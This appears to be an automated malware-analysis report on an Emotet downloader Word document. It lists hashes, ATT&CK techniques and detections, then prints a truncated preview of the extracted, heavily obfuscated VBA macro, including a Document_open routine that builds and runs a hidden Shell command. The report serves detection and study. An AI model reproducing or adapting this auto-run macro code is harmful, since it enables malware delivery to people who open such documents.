Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 3b54f67df383e30b…

MALICIOUS

Office (OLE)

Size: 317.0 KB
Created: 2018-07-19 15:10:00
Authoring application: Microsoft Office Word
First seen: 2018-11-13
MD5: 12a82ff7b7ce9c868e71f98fb7601830
SHA-1: 93c8bc3d33cd87e55942b5be425e5b0f9e35fb09
SHA-256: 3b54f67df383e30b7d667fd1fc714c8edc04de98b45e2ad6bcaade47db04651b
Risk Score: 182

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment
  • T1105 Ingress Tool Transfer

The critical ClamAV heuristic identifies this file as Doc.Downloader.Emotet-6877454-0, a known Emotet downloader. The presence of a Document_Open macro and a Shell() call within the VBA code strongly indicates that the macro is designed to execute a secondary payload. The VBA code itself is heavily obfuscated, but the overall behavior points to a downloader attempting to fetch and run additional malicious content.

Heuristics (5)

  • ClamAV: Doc.Downloader.Emotet-6877454-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6877454-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 34333 bytes
SHA-256: cd24e295750bc0d5ff5bb97d7803952b219446271a02532f5ed59656deb04a72

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "fEzkTrGMh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function ZhNziTowt()
On Error Resume Next
   hPJlAK = 77999 / sahvX - (LfuvDW - jOtkpF) / 99218 / PiznB * zPOKQw * HVzMi
   FPlLi = 74338 / AQAKEo - (csiHVz - QjlnZ) / 82575 / tvYHTZ * AzoJP * zwNzLH
   GmMMXM = 78805 / zBwwj - (zuoiD - wDkoH) / 57034 / LKDSn * qIXJqE * sIXQbi
   kZASqv = 67753 / CYFuG - (HujLYs - akzaPO) / 77160 / TNZzKa * CzwfHF * llKjO
End Function
Private Function BfCTzRUPBvCMQX()
On Error Resume Next
   Ftddik = 82522 / StBNv - (NiTkqi - EinTm) / 77076 / TmqEkL * whjGCi * uMzos
   OJzLI = 43888 / wmpOT - (spzfwQ - jUjuJz) / 83668 / IQQiNa * LqTlIz * ZjoAJ
   zZUCQZ = 3181 / qJswz - (jDzdj - OAninw) / 92244 / Vqiuf * VMWCU * tnrWNF
   fWoLi = 4421 / iljRPB - (aDXSiK - ZbKqA) / 95792 / Mwwvo * waXbV * FYhQzF
   Uwpwt = 1287 / FuiVdE - (SomWa - hzfwwf) / 9259 / sLKkm * sNGwC * pqjtFs
End Function
Private Function PFMoLojAXEv()
On Error Resume Next
   oFKfVu = 33063 / ILbbs - (PzFSs - LkEZG) / 45031 / uOGbhj * XARAvc * uDPwN
   OTkUjk = 49290 / OKiMiw - (GiTLP - biFdz) / 5851 / hjrAu * zVPwM * IYCuG
   kKUcYT = 99113 / VValiO - (PwfwvL - tLTNsY) / 79989 / GbjQW * DMaYpo * zwMlK
   jTMJt = 61873 / jnkiq - (hYNiSh - Kzzrj) / 14303 / HlYozs * WhUWwU * mJllI
   jzHSS = 44698 / EAkYzP - (uBjuu - lPhFXP) / 19723 / jpctb * KQzJPJ * Tzjbz
   VbDlP = 65814 / uuzGKQ - (SlbRj - PjTuiO) / 36558 / zQETP * dlwasb * jVHGi
   ROwnO = 52010 / pIIGBP - (zismu - njpBYE) / 85867 / KMozSv * iTREoz * dnTrMs
End Function
Private Function zWXOjOtKrs()
On Error Resume Next
   FpivLm = 95097 / tDDiZ - (GHTGAc - KLYJlS) / 70365 / cczGX * WsYhi * aAjFJ
   TfYoO = 16744 / viKmZT - (qRaEX - rjOvY) / 42866 / ZKcSz * KQkDol * aFshmH
   XzUmR = 47278 / LHFtS - (YASsV - RAqMWV) / 47549 / INaJbz * Ufufid * nPsdF
   ObRVt = 97283 / hnwQs - (FzhwSS - DUYNr) / 39598 / MaTsQ * jumJn * AansvO
End Function
Private Function jIBlFQjQdQrw()
On Error Resume Next
   zYqSMO = 65026 / viNEN - (wVEvjk - zJXjP) / 47363 / dTYuz * EqSQYL * FJSSpk
   JlHNs = 85959 / vTwUF - (rWjCbB - rLVBHs) / 52757 / ScBUXp * RlAwr * cuHCEW
   JBWbF = 315 / infJA - (BHDiNB - uOWJW) / 83296 / PIikZ * NEzfu * czRvzO
   GjSqw = 30829 / QGGzRd - (rzAhvS - uCfKp) / 29484 / OwCVD * LwidYZ * BftwaP
   wqCfo = 51506 / OSizp - (fbFTH - rGDoX) / 47443 / OoqFt * sOjcWP * WDbAh
   BrmwJw = 10837 / mSZbl - (hIQMEq - TROXtj) / 38012 / XtzDU * qzLAJi * WiLif
   UAftjK = 66256 / YYQPln - (ZaXRA - JELvMF) / 94376 / CsNokF * NFWKI * bmjts
End Function
Private Sub Document_open()
On Error Resume Next
   aPWzuR = (NvRzi - FVojC) - (nNMDrr - vEzbzP + SJmzD + cGRUQ)
   spkWh = (WKlKdI - clUGjJ) - (zwXmr - kBWBI + ViQicP + NPzVYX)
   BCwzZ = (hVJsCA - DzXIj) - (ujlEU - FAwvs + qVbGR + bZoKUi)
   zaRMLT = (hiDnW - SAShz) - (ioFYR - IUiYz + sqoOfO + zXjwsi)
Shell "" + HuIlVojjO + GzVKNUShJAv + CVar("c") + foFjwrmMGfoKr + bljvaVwPGvD + cHAzzrj + tmXDfnB + wqKCms + KEjzsKO + UOzcNzsX + sYtSdSiOcsN + lhIzbo + DtBBY + wvcjUA + wjMHiwN + NVXGizzwAuX + zCuLCCQa + QwYMoJPAs + csUviaRfLikwil, 0
   dkLGh = (qoDajE - aUjqS) - (iFscu - rSjjA + aGzmQh + QmCfs)
End Sub
Private Function wUOYhPlzmQ()
On Error Resume Next
   RLFKNK = (YVjJO - iCcRuL) - (FOEqt - buLPll + MmKNN + ELEXjJ)
   hkVUj = (XTRFs - WuIomQ) - (LlRGT - GRmFk + NoYQYf + fYnTwC)
   wwNVC = (RolcmX - hNYFw) - (LlhrUa - zIAwMi + mQHFl + JZjwwH)
   SPwRr = (sbCGO - OiJMG) - (YrTvrO - SGtAq + hZtIi + zuZfk)
   ESkYl = (vpjZW - HVJbkb) - (kwXIV - DWSXoO + csQSi + ARYjmX)
End Function
Private Function PRsJjDaUPd()
On Error Resume Next
   jjAwZD = (wZuYo - QAFvVt) - (dqijiw - LBMZt + RodaS + KBEVjD)
   GvlwA = (dOQwqd - CKGwC) - (fjKtz - DSHdmj + YNACWi + oAkHcl)
   cKJHO = (rQJii - bGliU) - (qCSwl - zIboP + wXacHh + NjEWr)
   NCaHU = (uovBmz - IVkiSQ) - (MBHkS - MfzDR + WvEED + LjdYEB)
   lFMwMp = (
... (truncated)